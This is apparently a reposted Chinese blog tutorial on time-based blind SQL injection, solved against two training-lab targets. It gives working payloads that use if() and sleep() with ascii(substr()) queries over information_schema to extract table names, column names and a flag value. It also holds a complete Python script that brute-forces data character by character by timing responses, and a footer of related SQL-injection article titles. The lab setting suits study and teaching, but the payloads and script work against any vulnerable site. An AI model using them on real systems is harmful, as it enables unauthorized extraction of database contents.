2. 程式人生 > 實用技巧 >延遲盲注

延遲盲注

阿新 發佈:2020-11-12
延遲盲注

你不知道你輸入的資料在sql被執行後是否是正確或錯誤的。你只知道有資料。

利用原理

藉助if語句,如果正確就sleep(5),延遲5秒返回資料。通過資料返回的時間大小判斷自己的語句是否正確執行。因為如果正確執行,會休眠5秒。錯誤執行,立馬返回!

靶場1

0x01 是布林盲注還是延遲盲注
payload
http://inject2.lab.aqlab.cn:81/Pass-13/index.php?id=1" and 1=2 -- qwe

這麼明顯錯誤的語句,沒有報錯。只知道是有資料的。那麼肯定不是布林盲注

0x02 判斷延遲盲注
payLoad:

id=1%22and%20if(length(database())%3E100,0,sleep(4))%20--+qwe

0x03 進一步注入查表
正確立馬返回,錯誤休眠5秒
payload:

and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1,0,sleep(10)) --+

然後開始爆破。因為我的intruder測試模組看不了響應的時間,所有我寫了個python指令碼去跑。以下原始碼和結果:
原始碼:

# -*- coding: utf-8 -*-
import requests
import time
 
def Timesql(proxies, user):
    for i in range(1,23):    #資料長度 這裡我偷了下懶 沒有先獲取長度
            for payload in range(35,130):    #遍歷取出字元
                    startTime=time.time()
                    url = 'http://inject2.lab.aqlab.cn:81/Pass-13/index.php?id=1"+and+if(ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),' + str(i)+',1))%3d'+str(payload)+',sleep(6),0)--%20qwe'    #url
                    cookies = {
                    }
                    response=requests.get(url,proxies=proxies)    #傳送請求
                    if time.time() - startTime > 5:    #判斷是否延時了5秒
                            user+=chr(payload)    
                            print(chr(payload))
                            break
            if  i != len(user): #無資料時候自動結束
                break
    print ('\nThe result is: '+user) 

def main():
    print ('begining \n')
    ip = '127.0.0.1:8080'
    proxies = {
    'http': 'http://' + ip,
    'https': 'https://' + ip
    }
    user = ''
    Timesql(proxies, user)
    
if __name__ == '__main__':
    main()

結果:

爆破欄位
payload2

1%22+and+if(ascii(substr((select+column_name+from+information_schema.columns+where+table_schema%3ddatabas
e()+and+table_name%3d'loflag'+limit+0,1),3,1))%3d129,sleep(6),0)--%20qwe

圖片:

檢視欄位內容
payload:

1%22+and+if(ascii(substr((select+flaglo+from+loflag+limit+1,1),1,1))%3d88,sleep(6),0)--%20qwe

圖片:

靶場2

原理一樣,注意閉合括號就好了。

payload:

1')+and+if(ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),3,1))%3d75,sleep(6),0)--%20qwe

圖片:

相關推薦

延遲

延遲 你不知道你輸入的資料在sql被執行後是否是正確或錯誤的。你只知道有資料。

SQL注入技巧之顯中過濾逗號繞過詳析

前言 sql注入在很早很早以前是很常見的一個漏洞。後來隨著安全水平的提高,sql注入已經很少能夠看到了。但是就在今天,還有很多網站帶著sql注入漏洞在執行。下面這篇文章主要介紹了關於SQL注入逗號繞過的相關內容,分

CTF-sql-order by

本文章只討論了order by,關於order by的報錯等注入不在本文章討論範圍,另有文章。

sqli-時間

目錄使用場景/條件時間用到的函式演示分析演示 使用場景/條件 沒有顯位/回顯,無法使用聯合/報錯,無法直接看到SQL語句執行的結果

BUUOJ | [CISCN2019 華北賽區 Day2 Web1]Hack World(SQL布林

題目地址 用瀏覽器連線靶機,看到以下頁面 右鍵檢視原始碼,發現上傳用的是 post 請求,根據提示知道 flag 位於 flag 表中的 flag 欄位裡

SQL Server手之延時型時間

近來處理安全問題遇到的sql注入: 延時函式 WAITFOR DELAY WAITFOR是SQL Server中Transact-SQL提供的⼀個流程控制語句。它的作⽤就是等待特定時間,然後繼續執⾏後 續的語句。它包含⼀個引數DELAY,⽤來指定等待的時

hex編碼繞waf(思路)

mysql分割函式有:substr、substring、left 當union、空格、and、or、註釋、substr被過濾的時候如下

sql bool

[CISCN2019 總決賽 Day2 Web1]Easyweb 考察: robots.txt image.php?bak檔案洩露,image.php.bak可以下載別的不大行

SQL注入漏洞--和寬位元組注入

是注入的一種,指的是在不知道資料庫返回值的情況下對資料中的內容進行猜測,實施SQL注入。一般分為布林和基於時間的和報錯的

DVWA靶場(七、

一、盲注介紹 盲注就是在SQL注入過程中,伺服器並沒有給客戶端返回資訊。通過盲注可以對程式對應的資料儲存區進行對應的探測。盲注分類可以分為基於時間和基於布林以及基於報錯的盲注

[sql 注入] insert 報錯注入與延時

insert注入的技巧在於如何在一個欄位值內構造閉合。 insert 報錯注入 演示案例所用的表:

初學Web安全之sql注入(四)—— (1)

當你的輸入沒有回顯,也沒有報錯的時候,但是輸入正確和錯誤的值時,頁面有不同表現時,這時候我們可以嘗試使用布林

sqli-labs less-8(布林)

less-8 布林 首先利用?id=1\' and 1=1 --+和?id=1\' and 1=2 --+確定id的型別為單引號\'\'包裹。然後進行

END的學習 SQL注入繞過 and POST基於時間和布林的

SQL注入繞過 1,大小寫繞過 2,雙寫繞過 3,編碼繞過 可以使用URL編碼,ASCII,HEX,unicode編碼繞過

一道題講懂SQL / [第一章 web入門]SQL注入-2

概述 本題是一個題,可以基於布林也可以基於時間,如果不會的話可以根據提示在網址後面加一個?tips=1降低難度成為一個基於報錯的

[CTF]基於布林的SQL

文章目錄 前言 [CTF學習]基於布林的SQL 一、題目 提  示: 基於布林的SQL 描  述: sql注入

dvwa sql教程

原文地址:https://www.jianshu.com/p/757626cec742 一、DVWA-SQL Injection(Blind)測試分析 SQL VS 普通SQL注入:

某系統Oracle+Bypass

總有一天你會明白什麼是愛,當你坐車來回幾百公里去看一個人的時候,在路上你就會明白。。。

利用DNS日誌進行MySQL

0x01 技術原理 這裡是利用load_file這個函式利用smb請求方式請求域名機器下的一個檔案,由於計算機對該域名不熟悉所以需要優先請求DNS,所以我們通過DNS日誌記錄中的內容來獲取回顯。解決了盲注回顯的問題,或者是

十六:SQL注入之查詢方式及報錯

在很多入時,有很多注入會出現無回顯的情況,其中不回顯的原因可能是SQL查詢語句有問題,這時候我們需要用到相關的報錯或者盲注進行後續操作,同時作為手工注入的時候,需要提前瞭解SQL語句能更好的選擇對應的